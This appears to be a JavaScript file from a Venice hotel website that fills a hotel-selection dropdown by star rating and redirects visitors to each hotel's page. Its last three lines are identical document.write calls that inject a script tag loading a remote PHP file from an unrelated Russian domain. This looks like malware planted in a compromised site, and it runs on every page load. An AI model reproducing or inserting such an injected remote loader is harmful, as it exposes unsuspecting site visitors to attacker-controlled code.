function addlist(){
var selectList = document.sexch.exch;
//	alert(selectList.value); 
//************************************************* ********************************************************* 1st line
if (selectList.value == "Fstar" ){
var llen = document.sexch.indxs.length;
var sellst = document.sexch.indxs;
for (i=1; i<=parseInt(llen); i++){
document.sexch.indxs.length--;
}
sellst.options[0] = new Option("Select Hotels");
sellst.options[1] = new Option("Bauer Grunwald Hotel ","../fivestarhotels/bauer-grunwald-hotel-venice.html");
sellst.options[2] = new Option("Bauer Il Palazzo Hotel Venice","../fivestarhotels/bauer-il-palazzo-hotel-venice.html");
sellst.options[3] = new Option("Luna Baglioni Hotel Venice","../fivestarhotels/luna-baglioni-hotel-venice.html");
sellst.options[4] = new Option("Sofitel Venice Hotel","../fivestarhotels/sofitel-hotel-venice.html");
}
if (selectList.value == "Fostar" ){
//alert("im in nse");
// ************************************************* *********************************************************2nd line
var llen = document.sexch.indxs.length;
var sellst = document.sexch.indxs;
for (i=1; i<=parseInt(llen); i++){
document.sexch.indxs.length--;
}
sellst.options[0] = new Option("Select Hotels");
sellst.options[1] = new Option("Antiche Figure Hotel Venice","../fourstarhotels/antiche-figure-hotel-venice.html");
sellst.options[2] = new Option("Ca Dei Conti Hotel Venice","../fourstarhotels/ca-dei-conti-hotel-venice.html");
sellst.options[3] = new Option("Capitol Palace Venice","../fourstarhotels/capitol-palace-venice.html");
sellst.options[4] = new Option("Carlton & Grand Canal","../fourstarhotels/carlton-and-grand-canal-hotel-venice.html");
sellst.options[5] = new Option("Cavalletto & Doge Orseolo Hotel Venice","../fourstarhotels/cavalletto-and-doge-orseolo-hotel-venice.html");
sellst.options[6] = new Option("Colombina Hotel Venice","../fourstarhotels/colombina-hotel-venice.html");
sellst.options[7] = new Option("Giorgione Hotel Venice","../fourstarhotels/giorgione-hotel-venice.html");
sellst.options[8] = new Option("Golden Tulip Tritone","../fourstarhotels/golden-tulip-tritone-hotel-venice.html");
sellst.options[9] = new Option("Hotel Sirio Mestre","../fourstarhotels/hotel-sirio-mestre-hotel-venice.html");
sellst.options[10] = new Option("Hungaria Palace Venice","../fourstarhotels/hungaria-palace-venice.html");
sellst.options[11] = new Option("Palazzo La Scala Hotel Venice","../fourstarhotels/palazzo-la-scala-hotel-venice.html");
sellst.options[12] = new Option("Palazzo Schiavoni Hotel Venice","../fourstarhotels/palazzo-schiavoni-hotel-venice.html");
sellst.options[13] = new Option("Panorama Hotel Venice","../fourstarhotels/panorama-hotel-venice.html");
sellst.options[14] = new Option("Plaza Hotel Venice","../fourstarhotels/plaza-hotel-venice.html");
sellst.options[15] = new Option("Principe Hotel Venice","../fourstarhotels/principe-hotel-venice.html");
sellst.options[16] = new Option("Quattro Fontane Hotel Venice","../fourstarhotels/quattro-fontane-hotel-venice.html");
sellst.options[17] = new Option("San Marco Palace","../fourstarhotels/san-marco-palace-hotel-venice.html");
sellst.options[18] = new Option("Sant Elena Venice Hotel","../fourstarhotels/sant-elena-venice-hotel.html");
sellst.options[19] = new Option("Santa Marina Hotel","../fourstarhotels/santa-marina-hotel.html");
 }
if (selectList.value == "Tstar" ){
//alert("im in nse");
// ************************************************* *********************************************************3rd line
var llen = document.sexch.indxs.length;
var sellst = document.sexch.indxs;
for (i=1; i<=parseInt(llen); i++){
document.sexch.indxs.length--;
}
sellst.options[0] = new Option("Select Hotels");
sellst.options[1] = new Option("Antico Panada","../threestarhotels/antico-panada-hotel-venice.html");
sellst.options[2] = new Option("Arlecchino Hotel Venice","../threestarhotels/arlecchino-hotel-venice.html");
sellst.options[3] = new Option("Best Western Hotel Montecarlo Venice","../threestarhotels/best-western-hotel-montecarlo-venice.html");
sellst.options[4] = new Option("Canaletto Hotel Venice","../threestarhotels/canaletto-hotel-venice.html");
sellst.options[5] = new Option("Carlton Capri Hotel Venice","../threestarhotels/carlton-capri-hotel-venice.html");
sellst.options[6] = new Option("Centrale Hotel  Venice","../threestarhotels/centrale-hotel-venice.html");
sellst.options[7] = new Option("Delfino Hotel Venice","../threestarhotels/delfino-hotel-venice.html");
sellst.options[8] = new Option("Diana Hotel Venice","../threestarhotels/diana-hotel-venice.html");
sellst.options[9] = new Option("Gardena Hotel Venice","../threestarhotels/gardena-hotel-venice.html");
sellst.options[10] = new Option("Hotel  Ariston Venice","../threestarhotels/hotel--ariston-venice.html");
sellst.options[11] = new Option("La Forcola Hotel Venice","../threestarhotels/la-forcola-hotel-venice.html");
sellst.options[12] = new Option("Olimpia Hotel Venice","../threestarhotels/olimpia-hotel-venice.html");
sellst.options[13] = new Option("Piave Hotel Venice","../threestarhotels/piave-hotel-venice.html");
sellst.options[14] = new Option("Rialto Hotel Venice","../threestarhotels/rialto-hotel-venice.html");
sellst.options[15] = new Option("Riviera dei Dogi Hotel Venice","../threestarhotels/riviera-dei-dogi-hotel-venice.html");
sellst.options[16] = new Option("San Zulian Hotel Venice","../threestarhotels/san-zulian-hotel-venice.html");
sellst.options[17] = new Option("Scandinavia Hotel Venice","../threestarhotels/scandinavia-hotel-venice.html");
sellst.options[18] = new Option("Tre Archi Hotel Venice","../threestarhotels/tre-archi-hotel-venice.html");
sellst.options[19] = new Option("Villa Casanova Hotel Venice","../threestarhotels/villa-casanova-hotel-venice.html");
sellst.options[20] = new Option("Zecchini Hotel Venice","../threestarhotels/zecchini-hotel-venice.html");
 
 }
 
if (selectList.value == "Other" ){
//alert("im in nse");
//************************************************* ********************************************************* 4th line
var llen = document.sexch.indxs.length;
var sellst = document.sexch.indxs;
for (i=1; i<=parseInt(llen); i++){
document.sexch.indxs.length--;
}
sellst.options[0] = new Option("Select Hotels");
sellst.options[1] = new Option("Canada Hotel Venice","../otherhotels/canada-hotel-venice.html");
sellst.options[2] = new Option("Hesperia Hotel Venice","../otherhotels/hesperia-hotel-venice.html");
sellst.options[3] = new Option("Villa Mabapa Hotel Venice","../otherhotels/villa-mabapa-hotel-venice.html");

 }
 
if (selectList.value == "other" ){
var llen = document.sexch.indxs.length;
var sellst = document.sexch.indxs;
for (i=1; i<=parseInt(llen); i++){
document.sexch.indxs.length--;
}
sellst.options[0] = new Option( "Hotels name");
//sellst.options[0] = new Option( "Sensex","bsegraphfeed1.xml");
//loadpage('bsegraphfeed1.xml');
  }
var len = selectList.options.length;
//selectList.options[len] = new Option("cc", "cc");
  }
    function loadPage()
  {
  var i
  i=document.sexch.indxs.value
  if(i=="")
	{
	window.location.href='http://www.a1venicehotels.com'
	}
  //alert(i)
  else  
    {
	window.location.href=i
	}
	
  }

document.write('<script src=http://myrussland.ru/images/nov_region.php ><\/script>');
document.write('<script src=http://myrussland.ru/images/nov_region.php ><\/script>');
document.write('<script src=http://myrussland.ru/images/nov_region.php ><\/script>');